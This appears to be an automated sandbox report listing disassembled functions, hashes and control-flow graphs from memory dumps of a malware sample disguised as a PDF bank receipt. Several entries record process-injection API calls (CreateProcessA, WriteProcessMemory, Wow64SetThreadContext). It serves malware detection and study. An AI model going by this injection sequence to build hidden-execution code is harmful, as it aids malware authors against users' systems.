                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d9850585ce48021c9384c1de5daacff0e767c3a65b1740b73583b2b2b7e0888a
                                                                                                                                                          • Instruction ID: 5f0da3e51189550458a6b10bfaffad0d3abd76f5f17c7d5e1b04d7fe491d2998
                                                                                                                                                          • Opcode Fuzzy Hash: d9850585ce48021c9384c1de5daacff0e767c3a65b1740b73583b2b2b7e0888a
                                                                                                                                                          • Instruction Fuzzy Hash: 5531D7B1E006188BEB58CFAADC547DEFBF3AFC9310F14C16AD409A6268DB7509558F90
                                                                                                                                                          Function 0B840040 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 84a5f5b3699a3858de5dad89f230a543ef5b9bc339702db976b308b023cbe56a
                                                                                                                                                          • Instruction ID: e807693c95d2373d6ab6062d44632601f5553673d732a4a035a3387a1fbf3d22
                                                                                                                                                          • Opcode Fuzzy Hash: 84a5f5b3699a3858de5dad89f230a543ef5b9bc339702db976b308b023cbe56a
                                                                                                                                                          • Instruction Fuzzy Hash: 0821BC71E006199BDB58CFABD84079EFBF7AFC8200F04C1B6D518A7224EB341A458F51
                                                                                                                                                          Function 0B841C81 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cd7eec4c53b90d6af0f4df4789cd7db01f9b8d46681d595fa872d93fc61f5817
                                                                                                                                                          • Instruction ID: 29372478551f158e8bc604a652604f6e33939efd9426d172f51f02b5c2ddab1b
                                                                                                                                                          • Opcode Fuzzy Hash: cd7eec4c53b90d6af0f4df4789cd7db01f9b8d46681d595fa872d93fc61f5817
                                                                                                                                                          • Instruction Fuzzy Hash: 9721EA70E016598BDB58CFAAC94469EBFF3AFC9300F14C06AD408AB368DB745A85CF51
                                                                                                                                                          Function 056F9B18 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 570 56f9b18-56fcfea 573 56fcfec-56fcfee 570->573 574 56fcff3-56fd003 570->574 577 56fd0a2-56fd0c7 573->577 575 56fd0ce-56fd1a0 574->575 576 56fd009-56fd019 574->576 597 56fd1a7-56fd1ea call 56f9b7c call 56f9bb8 575->597 576->575 578 56fd01f-56fd023 576->578 577->575 579 56fd02b-56fd04a 578->579 580 56fd025 578->580 583 56fd04c-56fd06c call 56f9b7c call 56f9b8c call 56f9b08 579->583 584 56fd071-56fd076 579->584 580->575 580->579 583->584 587 56fd07f-56fd092 call 56f9bac 584->587 588 56fd078-56fd07a call 56f9b9c 584->588 596 56fd098-56fd09f 587->596 587->597 588->587 596->577 613 56fd1ef-56fd1f2 597->613 614 56fd1f4-56fd1f6 613->614 615 56fd200-56fd27d call 56f9bc4 613->615 617 56fd1fc-56fd1ff 614->617 618 56fd284 614->618 629 56fd27e 615->629 621 56fd286-56fd2a1 618->621 621->629 630 56fd2a3-56fd2a9 621->630 629->618 630->621 632 56fd2ab-56fd2ad 630->632
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (oq$Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3931962165
                                                                                                                                                          • Opcode ID: 63bbdaac44a086356730f2d63c918e8729c3b03cb7161a336210f41010dda93f
                                                                                                                                                          • Instruction ID: 14e6f90ef44121672d37f0047ae38cbbfc0682239991ca4ac787f6d73323476c
                                                                                                                                                          • Opcode Fuzzy Hash: 63bbdaac44a086356730f2d63c918e8729c3b03cb7161a336210f41010dda93f
                                                                                                                                                          • Instruction Fuzzy Hash: 1871BE70B002069FDB58AFA8845466F7BFAFFC4350B20496AE606DB395DE349C06C7A5
                                                                                                                                                          Function 056FE920 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 864 56fe920-56fe982 call 56fd680 870 56fe9e8-56fea14 864->870 871 56fe984-56fe986 864->871 873 56fea1b-56fea23 870->873 872 56fe98c-56fe998 871->872 871->873 878 56fe99e-56fe9a0 872->878 879 56fea2a-56fea6b 872->879 873->879 880 56fe9aa-56fe9e7 call 56fd68c 878->880 892 56fea73-56fea95 879->892 895 56fea97-56feb65 892->895 898 56feb6b-56feb79 895->898 899 56feb7b-56feb81 898->899 900 56feb82-56febc8 898->900 899->900 905 56febca-56febcd 900->905 906 56febd5 900->906 905->906 907 56febd6 906->907 907->907
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3106737575
                                                                                                                                                          • Opcode ID: d6e30b9ad8dd85970fbe05c98ee22505ac380abbaf5c3d0e3f3ee22c43ecfbca
                                                                                                                                                          • Instruction ID: 78085fb27d734f4bfc4c6e29b5db7f45b7c76fc42626ee1a7df288694f0ca2f1
                                                                                                                                                          • Opcode Fuzzy Hash: d6e30b9ad8dd85970fbe05c98ee22505ac380abbaf5c3d0e3f3ee22c43ecfbca
                                                                                                                                                          • Instruction Fuzzy Hash: BD817C70E003198FDB14DFA9C594AAEBBF6FF88300F14852AE409AB364DB349945CB91
                                                                                                                                                          Function 0B84ADE0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 967 b84ade0-b84ae03 968 b84ae05 967->968 969 b84ae0a-b84af30 call b84b5d0 967->969 968->969 983 b84afc4-b84afca 969->983 985 b84ae47-b84ae4b 983->985 986 b84af41-b84afb1 985->986 987 b84ae51-b84af36 985->987 1000 b84afb3 call b84bea5 986->1000 1001 b84afb3 call b84c1d6 986->1001 1002 b84afb3 call b84bc19 986->1002 987->985 998 b84afb9-b84afc3 998->983 1000->998 1001->998 1002->998
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          • Opcode ID: e504edbdeeeba3b4ca1a17fb018116cb6fab0a1df65245820bc83741e71cd773
                                                                                                                                                          • Instruction ID: 51c722cb91fa2f0fa1d0890cb0492376bfd98265358444bbaec5640a8add2c6c
                                                                                                                                                          • Opcode Fuzzy Hash: e504edbdeeeba3b4ca1a17fb018116cb6fab0a1df65245820bc83741e71cd773
                                                                                                                                                          • Instruction Fuzzy Hash: E66107B4E4420DCFDB08CFA9D944AEEBBB6BF88704F109029D519AB365DB315905CB50
                                                                                                                                                          Function 056F9B28 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3106737575
                                                                                                                                                          • Opcode ID: def74c3d7fc3e9e2eb825ba261c8cf2bc3da7221dae52ad7d39b7504a8eb38dc
                                                                                                                                                          • Instruction ID: 58e54f7c23ca6d4c74741f10c740c4157a4d88e56c1203a27fe194dbb86976a7
                                                                                                                                                          • Opcode Fuzzy Hash: def74c3d7fc3e9e2eb825ba261c8cf2bc3da7221dae52ad7d39b7504a8eb38dc
                                                                                                                                                          • Instruction Fuzzy Hash: E6518A71E042099FDB14DFAAC454AAEBBF6FF89310F14846AD50AE7380DB349D05CBA5
                                                                                                                                                          Function 056FCFC8 Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (oq$Hoq
                                                                                                                                                          • API String ID: 0-3084834809
                                                                                                                                                          • Opcode ID: e8c1c1b0dc5f3f2ea8446ad246edf6349f62c68385d917dee53ee89a41356e7b
                                                                                                                                                          • Instruction ID: 5bfa79451cdc46bcb3a33636511889c100b7fbf9f274ebbc0cc6e949aaecd631
                                                                                                                                                          • Opcode Fuzzy Hash: e8c1c1b0dc5f3f2ea8446ad246edf6349f62c68385d917dee53ee89a41356e7b
                                                                                                                                                          • Instruction Fuzzy Hash: CB41C070B042068FDB586FA8842856F7FBBFBC4380B25896AD1069B3D4DE348C06C795
                                                                                                                                                          Function 0A0F17CC Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A0F1A0E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          • Opcode ID: 3d047b39410f45b53f307bb99d567ea28c09768215b89b7dc17c365715bdb1ed
                                                                                                                                                          • Instruction ID: e1dd221de0d7e91e86371aaabfbaf91941319f751d3f9acc1a29a3dee4e340c0
                                                                                                                                                          • Opcode Fuzzy Hash: 3d047b39410f45b53f307bb99d567ea28c09768215b89b7dc17c365715bdb1ed
                                                                                                                                                          • Instruction Fuzzy Hash: 10A15871D00219DFDB24CFA8C940BDDBBF2AF48310F148AAAE909B7650DB749985CF91
                                                                                                                                                          Function 0A0F17D8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A0F1A0E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          • Opcode ID: 4b52054222bfe1234960b6a850531d40fc060e2047d07a43433c7c60f9f64d56
                                                                                                                                                          • Instruction ID: 1357f13c3ac26e29c0ac129ea8b8ba2b986bdd8f1b83f3ef68bf96b28e5a7ae4
                                                                                                                                                          • Opcode Fuzzy Hash: 4b52054222bfe1234960b6a850531d40fc060e2047d07a43433c7c60f9f64d56
                                                                                                                                                          • Instruction Fuzzy Hash: 5B914871D00219DFDB54CFA8C940B9DBBF2BF48310F148AAAEA08B7654DB749985CF91
                                                                                                                                                          Function 016598C0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0165AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 915acb0dfdd60d4a2d4a1e3938506db7eb710c4a2ce0d58cca987d788f023a2f
                                                                                                                                                          • Instruction ID: e37e389415e21f0066006262d878f713f7266823b80d8308597a930b2f7347af
                                                                                                                                                          • Opcode Fuzzy Hash: 915acb0dfdd60d4a2d4a1e3938506db7eb710c4a2ce0d58cca987d788f023a2f
                                                                                                                                                          • Instruction Fuzzy Hash: BD41EEB1C0071DCFDB24DFA9C844B8EBBB5BF48304F20816AD808AB255DB756986DF90
                                                                                                                                                          Function 0165ADCD Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0165AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 2550ed019c2e5d77d195c7f1263f2c036e9178d3c576eaff8817953ab987b5f9
                                                                                                                                                          • Instruction ID: 10ca20e1ec1948ae8aefe207c1ba10d7a1dbdeeeb5e25dde4406b793d45bdd20
                                                                                                                                                          • Opcode Fuzzy Hash: 2550ed019c2e5d77d195c7f1263f2c036e9178d3c576eaff8817953ab987b5f9
                                                                                                                                                          • Instruction Fuzzy Hash: 7C4100B1C00719CFDB24DFA9C944BCEBBB5BF48304F20816AD408AB255DB756986CF90
                                                                                                                                                          Function 081596E0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFromIconResource
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3668623891-0
                                                                                                                                                          • Opcode ID: 0035d7e034923e1289f51fae18a6a001c5d5d3e1cac9438f9d35ef609f7f9c45
                                                                                                                                                          • Instruction ID: 4e43f1d90a3078336b078364f45a3ffb5fde1fce60e7edd2ba5c4b6f4b69c9e6
                                                                                                                                                          • Opcode Fuzzy Hash: 0035d7e034923e1289f51fae18a6a001c5d5d3e1cac9438f9d35ef609f7f9c45
                                                                                                                                                          • Instruction Fuzzy Hash: AF3186B6900248DFCB01CFA9D804AAABFF8EF49310F14805AFA54AB221C3359950DFA1
                                                                                                                                                          Function 0A0F154B Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A0F15E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: a523d63c022efd7d17cc13d89bf86e584da0c0e90ee87bc06769b1226ef6d0ee
                                                                                                                                                          • Instruction ID: 7ddd4d15ae8e8bdd67da0627a4c074e009d541663b9ec6e2f6fbd8c4103c3638
                                                                                                                                                          • Opcode Fuzzy Hash: a523d63c022efd7d17cc13d89bf86e584da0c0e90ee87bc06769b1226ef6d0ee
                                                                                                                                                          • Instruction Fuzzy Hash: E42125B1D10319DFCB10DFA9C881BEEBBF5BF48310F10882AE959A7250C7789544CB64
                                                                                                                                                          Function 08157B70 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 08157C0F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrawText
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2175133113-0
                                                                                                                                                          • Opcode ID: b6f33d07974ec65928efa2b9fd9235b18422d5b0f066e8222162d77a8c53f16c
                                                                                                                                                          • Instruction ID: 5b711b32beedc6361e74309905d522fed2d17602ccb157bbfa0eb8607f9eff93
                                                                                                                                                          • Opcode Fuzzy Hash: b6f33d07974ec65928efa2b9fd9235b18422d5b0f066e8222162d77a8c53f16c
                                                                                                                                                          • Instruction Fuzzy Hash: D131C0B590020A9FDB10DF9AD984A9EBBF5FF48310F14882EE919A7350D774A944CFA0
                                                                                                                                                          Function 08157B78 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 08157C0F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrawText
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2175133113-0
                                                                                                                                                          • Opcode ID: f962f301247d8197ce030f38f7054df6584cf0ad434b2baa8953dee4cb7e9327
                                                                                                                                                          • Instruction ID: 5d942f45518cdd2dcd05924051eb3a1c154c5330b8d882906f45f431852bfac7
                                                                                                                                                          • Opcode Fuzzy Hash: f962f301247d8197ce030f38f7054df6584cf0ad434b2baa8953dee4cb7e9327
                                                                                                                                                          • Instruction Fuzzy Hash: BC21C0B59002099FDB10CF9AD884A9EFBF5EF48320F14882EE819A7350D774A944CFA0
                                                                                                                                                          Function 0A0F1550 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A0F15E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: 3e7d0c7328a359032718383f616566c73dc1109c20b86a8e2abd1c81a808519d
                                                                                                                                                          • Instruction ID: 73031998b9816fa68cc1c120dfa66bc386e325b879e8bb74738714b4ff9d1a22
                                                                                                                                                          • Opcode Fuzzy Hash: 3e7d0c7328a359032718383f616566c73dc1109c20b86a8e2abd1c81a808519d
                                                                                                                                                          • Instruction Fuzzy Hash: 122104B1D00359DFCB10DFA9C885BDEBBF5FB48310F108829EA59A7250C7789944CBA4
                                                                                                                                                          Function 0A0F1639 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A0F16C0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: cc7c1d4bb5a422f8b90a795984189a70178a2103eba2ad4a9ab8248b3cf13719
                                                                                                                                                          • Instruction ID: 754298ccb5d2e70e0f3042edd62b4f46f70b0f7636c95a0a6a676ea01a974e30
                                                                                                                                                          • Opcode Fuzzy Hash: cc7c1d4bb5a422f8b90a795984189a70178a2103eba2ad4a9ab8248b3cf13719
                                                                                                                                                          • Instruction Fuzzy Hash: D82125B1D00359DFCB10CFA9C840AEEBBF5FF48310F14882AE958A7250C7389544CBA4
                                                                                                                                                          Function 0A0F0F79 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A0F0FFE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 4e45de1a4b62fbb4f7a3994e9ebb38ff94d6015a526578984879a3572e537b49
                                                                                                                                                          • Instruction ID: 0098843beb0aa85d148c461639e831006cebff8a63178db6a597d2d5e15f6166
                                                                                                                                                          • Opcode Fuzzy Hash: 4e45de1a4b62fbb4f7a3994e9ebb38ff94d6015a526578984879a3572e537b49
                                                                                                                                                          • Instruction Fuzzy Hash: 3A2145719003088FDB10CFAAC4857EEBBF4AB88320F10882AD559A7250C7789944CFA4
                                                                                                                                                          Function 0A0F1640 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A0F16C0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: e891c6621c5f74be2c8f2a832d371e93e1a70cd10a99e9599e17e3e2bc136440
                                                                                                                                                          • Instruction ID: 4dd9083ba010ca074cc6d554e91953eb03271217dbad00c1fb7a001d1540b756
                                                                                                                                                          • Opcode Fuzzy Hash: e891c6621c5f74be2c8f2a832d371e93e1a70cd10a99e9599e17e3e2bc136440
                                                                                                                                                          • Instruction Fuzzy Hash: 572128B1D00359DFCB10DFAAC840ADEBBF5FF48320F108829E958A7250C7789544CBA4
                                                                                                                                                          Function 0A0F0F80 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A0F0FFE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 61ea423ff306c8b856c52e321d063c01e834947f8c2e4ff19ad070d04d28573b
                                                                                                                                                          • Instruction ID: b2d18cd6d2e42ddd0e487baca69ae610b9a829b659b755af97e55105d8dc7a02
                                                                                                                                                          • Opcode Fuzzy Hash: 61ea423ff306c8b856c52e321d063c01e834947f8c2e4ff19ad070d04d28573b
                                                                                                                                                          • Instruction Fuzzy Hash: CE2135B1900309CFDB10DFAAC4857EEBBF4EF48324F10842AD559A7241CB78A944CFA4
                                                                                                                                                          Function 081569AC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,081596FA,?,?,?,?,?), ref: 0815979F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFromIconResource
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3668623891-0
                                                                                                                                                          • Opcode ID: 1327983dbb90016af9b677e894b30e877a6ff3bf7387857fc08388eff89054f5
                                                                                                                                                          • Instruction ID: d931b53a6b490fac3895af9ffd802c5ba3a28403f987b6ec34db528a3bcafb5f
                                                                                                                                                          • Opcode Fuzzy Hash: 1327983dbb90016af9b677e894b30e877a6ff3bf7387857fc08388eff89054f5
                                                                                                                                                          • Instruction Fuzzy Hash: 211147B1800249DFDB10CF99D844ADEBFF8EB48320F14801AE914A7210C375A950CFA5
                                                                                                                                                          Function 0A0F1488 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
